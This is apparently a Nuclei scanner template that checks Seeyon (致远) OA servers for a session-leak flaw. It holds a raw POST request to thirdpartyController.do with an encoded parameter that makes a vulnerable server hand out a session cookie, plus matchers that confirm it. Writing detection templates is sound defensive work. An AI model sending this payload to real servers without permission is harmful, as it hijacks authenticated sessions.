id: zhiyuan-session-leakage

info:
  name: 致远OA Session泄露 
  author: Str1am
  severity: high
  reference: https://github.com/govbk/WIKI-POC-EXP/blob/7d1194429dab9f9dd8139408e79b70ddb41a468f/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20Session%E6%B3%84%E9%9C%B2%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  tags: zhiyuan,upload

requests:
  - raw:
      - |
        POST /seeyon/thirdpartyController.do HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.25.1
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Length: 133
        Content-Type: application/x-www-form-urlencoded

        method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "a8genius.do"
        part: body
      - type: word
        words:
          - "Set-Cookie"
        part: header
        condition: and